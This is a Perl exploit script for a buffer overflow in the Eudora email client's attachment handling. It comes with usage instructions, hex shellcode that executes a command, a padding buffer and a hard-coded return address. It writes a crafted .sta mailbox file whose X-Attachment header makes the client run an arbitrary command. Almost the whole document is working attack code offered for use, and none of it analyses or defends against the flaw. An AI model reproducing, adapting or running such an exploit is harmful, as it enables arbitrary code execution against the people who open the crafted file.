EudExploit_private.pl

`# Author: LibX ([email protected])  
# Date: 29-06-2004  
# Exploit #: 1  
  
# Program: Eudora  
# Tested on: v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)  
# Exploit Type: Local Buffer overflow  
# Shellcode: Shellcode to execute a command  
# Shellcode version: v2.5 PRIVATE (GENERIC)  
# How-tu-use: EudExploit.pl <command to execute> > <urfilename>.sta  
  
  
  
if(!($ARGV[0]))  
{  
  
print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5");  
print("Usage: EudExploit.pl <command to execute> > <urfilename>.sta\n\n");  
print("Sample: EudExploit.pl notepad.exe > TestShell.sta");  
exit;  
  
}  
  
  
  
# command execution shellcode  
$shellcode = "\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .  
"\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .  
"\xD9\x29\xD9\x81\xC7\x10\x11\x11" .  
"\x11\x81\xEF\x11\x11\x11\x11\xFE" .  
"\x07\x81\xC1\x10\x11\x11\x11\x81" .  
"\xE9\x11\x11\x11\x11\x29\xCF\x31" .  
"\xF6\x46\x56\x57\xBB\x66\x8B\x45" .  
"\x0C\xB9\x11\x11\x11\x11\xB8\x41" .  
"\x11\x11\x11\x2D\x32\x11\x11\x11" .  
"\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .  
"\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .  
"\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .  
"\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .  
"\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .  
"\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF";  
  
  
  
# some crap  
$buffer = "A" x (268 - length($shellcode));  
  
  
  
# EuLang.dll universal return address (625010E9: call edi)  
$return = "\xE9\x10\x50\x62";  
  
  
  
print("From: me\n");  
print("To: you\n");  
print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");  
print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");`